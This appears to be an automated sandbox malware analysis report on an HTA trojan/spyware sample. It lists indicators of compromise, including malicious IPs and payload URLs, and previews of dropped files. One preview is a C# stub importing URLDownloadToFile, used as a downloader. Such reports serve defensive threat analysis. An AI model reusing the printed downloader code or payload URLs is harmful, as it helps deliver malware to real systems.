                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:needagoodplanforsuccesstogetbackbest.hta
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 58
                                                                                  • Number of non-executed functions: 269
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .hta

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.175.87.197
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  20:19:00API Interceptor39x Sleep call for process: powershell.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  104.21.48.1345623.batGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                  • www.shlomi.app/9rzh/
                                                                                  ySUB97Jq80.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • www.shlomi.app/9rzh/
                                                                                  hQaXUS5gt0.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.newanthoperso.shop/3nis/
                                                                                  6nA8ZygZLP.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rbopisalive.cyou/2dxw/
                                                                                  UhuGtHUgHf.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.enoughmoney.online/z9gb/
                                                                                  Bill_of_Lading_20250307_pdf.bat.exeGet hashmaliciousLokibotBrowse
                                                                                  • touxzw.ir/sccc/five/fre.php
                                                                                  Stormwater Works Drawings Spec.jsGet hashmaliciousFormBookBrowse
                                                                                  • www.lucynoel6465.shop/jgkl/
                                                                                  Shipment Delivery No DE0093002-PDF.exeGet hashmaliciousLokibotBrowse
                                                                                  • touxzw.ir/tking3/five/fre.php
                                                                                  Remittance_CT022024.exeGet hashmaliciousLokibotBrowse
                                                                                  • touxzw.ir/fix/five/fre.php
                                                                                  http://microsoft-sharepoint4543464633.pages.dev/index-2jc93/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • microsoft-sharepoint4543464633.pages.dev/index-2jc93/
                                                                                  23.95.235.28APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.235.28/xampp/rmo/rmn/needagoodplanforsuccesstogetbackbest.hta
                                                                                  APC2_240708172813545null_847608629.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.235.28/xampp/rmo/rmn/needagoodplanforsuccesstogetbackbest.hta
                                                                                  FORMULARZ ODPRAWY CELNEJ DHL.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.235.28/xampp/rmo/needagoodplanforsuccesstogetbackbest.hta
                                                                                  efs.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                  • 23.95.235.28/60/csso.exe
                                                                                  dok PZ 2025-03-11_142242 fin_Orygina#U0142.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.235.28/xampp/rsc/rc/efs.hta
                                                                                  dok PZ 2025-03-11_142242 fin_Orygina#U0142.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.235.28/xampp/rsc/rc/efs.hta
                                                                                  uhg.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                  • 23.95.235.28/50/csso.exe
                                                                                  Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.235.28/xampp/rsc/uhg.hta
                                                                                  Neue Bestellung 236904.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.235.28/xampp/rsc/uhg.hta
                                                                                  Bozza nuovo ordine 0010979742.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 23.95.235.28/xampp/ugccs/yougetgoodthingswithbestadvantageforthis.hta

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  checkip.dyndns.comCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 132.226.8.169
                                                                                  iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 132.226.247.73
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 193.122.6.168
                                                                                  SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 158.101.44.242
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 193.122.6.168
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 132.226.247.73
                                                                                  Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 132.226.8.169
                                                                                  FVWbiG8vBc.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 193.122.130.0
                                                                                  TOP20250252.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  QUOTATION_MARQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                  • 132.226.247.73
                                                                                  reallyfreegeoip.orgCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.32.1
                                                                                  iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.16.1
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.64.1
                                                                                  SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.64.1
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.80.1
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.64.1
                                                                                  Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 104.21.64.1
                                                                                  FVWbiG8vBc.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.112.1
                                                                                  TOP20250252.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 104.21.80.1
                                                                                  QUOTATION_MARQUOTE312025PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                  • 104.21.16.1

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSJITZq92T28.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.64.41.3
                                                                                  12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.32.1
                                                                                  JITZq92T28.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.64.41.3
                                                                                  41QUE01 - TAX INVOICE - 7274916 from SFG (Brisbane).htmlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                  • 172.67.70.233
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.32.1
                                                                                  https://apply.atu.ie/_entity/sharepointdocumentlocation/a10f35db-a302-f011-bae2-7c1e524f2423/903e00e6-7542-ee11-bdf3-6045bd8c56d2?file=CONFIDENTIALDoc_Au89994.pdfGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                                                                  • 188.114.96.3
                                                                                  jbJFtxTmyS.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                  • 172.67.72.57
                                                                                  iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.16.1
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.64.1
                                                                                  SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.64.1
                                                                                  AS-COLOCROSSINGUSverynicegirlgivenmebestwordforgreatnesswithgoodthings.htaGet hashmaliciousUnknownBrowse
                                                                                  • 192.3.95.138
                                                                                  Build.exeGet hashmaliciousStormKittyBrowse
                                                                                  • 23.94.126.116
                                                                                  h2wb5_002.exeGet hashmaliciousDarkVision RatBrowse
                                                                                  • 104.168.28.10
                                                                                  dBKUxeI.exeGet hashmaliciousAsyncRAT, DarkVision RatBrowse
                                                                                  • 104.168.28.10
                                                                                  random.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, XmrigBrowse
                                                                                  • 107.174.192.179
                                                                                  earereallyniceloverwithgreatthingsonthatkissinggirlonme.htaGet hashmaliciousRemcosBrowse
                                                                                  • 172.245.191.88
                                                                                  goodmanwnatgoodthingsforbesthings.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                                                                  • 192.3.101.146
                                                                                  Our Order.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 198.12.89.24
                                                                                  ienetstatgoodforkissing.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 192.227.228.22
                                                                                  Proof of Payment and Statement.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 192.227.228.22
                                                                                  ORACLE-BMC-31898USCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 193.122.6.168
                                                                                  SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 158.101.44.242
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 193.122.6.168
                                                                                  FVWbiG8vBc.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 193.122.130.0
                                                                                  TOP20250252.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  DHL Shipping Details Ref ID 4466331798008765975594-pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 158.101.44.242
                                                                                  ienetstatgoodforkissing.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 193.122.6.168
                                                                                  7495 P.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  SOA FEB 2025.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 158.101.44.242
                                                                                  13.03.2025-13.03.2025 shtml.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 158.101.44.242

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  54328bd36c14bd82ddaa0c04b25ed9adCloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.48.1
                                                                                  iCgb4kAWFh.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.48.1
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.48.1
                                                                                  SOA OF FEB 2025 PT.BINEX.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.48.1
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.48.1
                                                                                  CloudServices.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.48.1
                                                                                  Ogdu1MivyN.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                                                  • 104.21.48.1
                                                                                  FVWbiG8vBc.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                  • 104.21.48.1
                                                                                  Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                  • 104.21.48.1
                                                                                  shit.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.48.1

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):980992
                                                                                  Entropy (8bit):6.875555651887693
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:/u6J33O0c+JY5UZ+XC0kGso6Fa4aL34eprdWY:Ju0c++OCvkGs9Fa4aL341Y
                                                                                  MD5:54DE0C8E192E7BC71B6D284FFF136296
                                                                                  SHA1:F2AB671CBF4229C9C7EA12F01B148E470B6621E7
                                                                                  SHA-256:D274A8FCA173BF675C950AAD9A3D09EF48DCE2522756BC6BEBA0E08DB8DCFC90
                                                                                  SHA-512:5EE16D7EB2ED2B7CF85225ACC2FDB43144581CA54BB171FE129B5F2ABF5E067D1BFE9472616714BB869C7AC3765CCF22873F56F116BBFA6F1CEE37863D35F258
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...y..g.........."..................}............@..........................`............@...@.......@.....................L...|....p...o.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....o...p...p..................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):5.405945905705216
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:3K1yt4WSKco4KmM6GjKbmOIKo+mN1s4RPQoU99t7J0gt/NK3R8UHrgtq:sy+WSU4Yymp+ms4RIoU99tK8NWR8WP
                                                                                  MD5:B14C2335AAE9A3377664B1241901B608
                                                                                  SHA1:26671759F4E4DF97B4FCBF96A378A3809F685FD1
                                                                                  SHA-256:644A49D980BCA8A3C180B6EEC207B61A82CABA4B9FBB0D6E804D5ED9EB036E1A
                                                                                  SHA-512:ED719AA3C7D26560B1415C824451206F3AF1CDCB3BA4402CD7733209890759B7A2FA3822D53FDC39C899CD65F3ECEF39ABBE8E648282D189B54FFE26F33EAF6E
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                  C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.0.cs

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (360)
                                                                                  Category:dropped
                                                                                  Size (bytes):479
                                                                                  Entropy (8bit):3.750991504160988
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:V/DsYLDS81zuUedyk0mdOmMGlvQXReKJ8SRHy4H4Qm4m1mvlmOwmQy:V/DTLDfuDdOdXfHa6LQy
                                                                                  MD5:B49F3695D3B07F65D78DF9AA701DCD7B
                                                                                  SHA1:DF0C9DA5C709077F924EF7E102F7DC50D3FA4842
                                                                                  SHA-256:71CFC2436BEB146574A1291ED463156F17EC292807A8F2FFF24CE178387D9B99
                                                                                  SHA-512:E56732AAE2DBAC65F0CEB25E50DB3BDB64D46027EBF3D40A500104DCC1E7BFEC958BED542A44A3BB974422F4AA4EE6D61B8C817DC55B6D62BF33F4B6D60E95EF
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace VGVao.{. public class TGNDoGqCKG. {. [DllImport("urLMon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr gWQipMDGdr,string jgk,string EizcMHvvBZ,uint r,IntPtr E);.. }..}.

                                                                                  C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):375
                                                                                  Entropy (8bit):5.224666411547813
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fE8ssUzxs7+AEszIN723fE8s+x:p37Lvkmb6K2an8WZETan/x
                                                                                  MD5:08093A3BF1DB6BE2914EACF06DEEAFAD
                                                                                  SHA1:4E4D280B642B27038A402BBCA66F55C72A735512
                                                                                  SHA-256:8EAD6F72DEA4498C5FC6CF7271DD1538248DE75C512242EF5AA6A0A5B8893FB2
                                                                                  SHA-512:6F8DF4EC625DBEA9B91D2D75BEC017EACAE1E949CB33F2D0668CF01E528592F2C38983719E97AACF213B7F3DA05D2C8E18E6255EEF1F270E7F45D0E02439128A
                                                                                  Malicious:true
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.0.cs"

                                                                                  C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):2.820772974529545
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:etGSSPBG5eM7p882uckX/befKsDtkZfgjrqhkWI+ycuZhNQakSsPNnq:6BsM+fa/KfKtJgjrEH1ulQa38q
                                                                                  MD5:1A1F406192C4B1BB085A6715F8BF1619
                                                                                  SHA1:E09A7734C346B5C6C969F562321BB8B78EC6F3FE
                                                                                  SHA-256:16A101E773E5B552FB07BE025375ACEF1011CE3E37E57FC994149DF8860B57C5
                                                                                  SHA-512:D14B9636392975A91E6152C40CA50E7AE474AAE2F8AC334F151EDEE7CD70449892CD5F490C2458BD2F925E4DE6795ACF885013C57CDB582117CF6252B51D2731
                                                                                  Malicious:true
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1.....u.....u...........................".............. ?.....P ......Q.........W.....b.....f.....q.....s...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.43

                                                                                  C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.out

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):876
                                                                                  Entropy (8bit):5.299403899878867
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:KOuqd3ka6K2antETan/UKax5DqBVKVrdFAMBJTH:yika6CtE+/UK2DcVKdBJj
                                                                                  MD5:CA10DB9E0651548E26556156B08E8E02
                                                                                  SHA1:9ABA4D55D81C8F79722AEE86EFC9BAE21805BCCB
                                                                                  SHA-256:7C8F7B8B1BFBC955F76BE8FDD6BF09148A7F536760BCCE22680140C58624985F
                                                                                  SHA-512:52204A18D968461467777E00A589DA09313414F6128B411B97E3E484CBB8101135F4085087942F7343B69D02C79ADE5FDF9D70D2BB8301E27CBF0015F0354B1B
                                                                                  Malicious:false
                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                  C:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.115537472240626
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuak7YnqqsPN5Dlq5J:+RI+ycuZhNQakSsPNnqX
                                                                                  MD5:B3F4CCED1657D1D4CD16A8A2A71152C7
                                                                                  SHA1:54BA36E98D75FEFDE9AE49DEB8D76D420D5C2386
                                                                                  SHA-256:CF01B14B11BA08B2828A76C10586A2C4FD56A3B54CD913389F4837AB726AA5CE
                                                                                  SHA-512:7900FD73825DB472F13C28E02CCA90F91812BB19FEFA106AC9760B07B407DC381EF227671F0DFA01DD69D1B2FD2E962BC9C433B5CB2CA374D8961ECFA82106E0
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.3.s.w.u.u.3.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.3.s.w.u.u.3.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                  C:\Users\user\AppData\Local\Temp\RESC5CF.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Mon Mar 17 01:29:47 2025, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1340
                                                                                  Entropy (8bit):4.004559335950445
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HcK9oVa5eqaHMwKcjmfwI+ycuZhNQakSsPNnqSed:WI5efzK2mo1ulQa38qS+
                                                                                  MD5:6127A2DE71F301ED60AD8F7B53BF2071
                                                                                  SHA1:7BBA6478E1B163F74514A2FFCE741A5F30A49878
                                                                                  SHA-256:D4B60FF184FC4E3403EAEC2689143DD946A2B628EF287E5B00A0ADB4D355B86C
                                                                                  SHA-512:97F18A5805D450EBA15B3D01AB84F3F33A4CC399D83CDAF45DECADE767D61B7D6B512154DCB3FDD7A249F05F8CF4CC87AA4479E88877199287C6AEFB38D9ECD5
                                                                                  Malicious:false
                                                                                  Preview:L....{.g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP.....................W........R...........7.......C:\Users\user\AppData\Local\Temp\RESC5CF.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.3.s.w.u.u.3.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hd1kehy.5nl.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_disjavlp.siv.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5w2zet0.25m.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
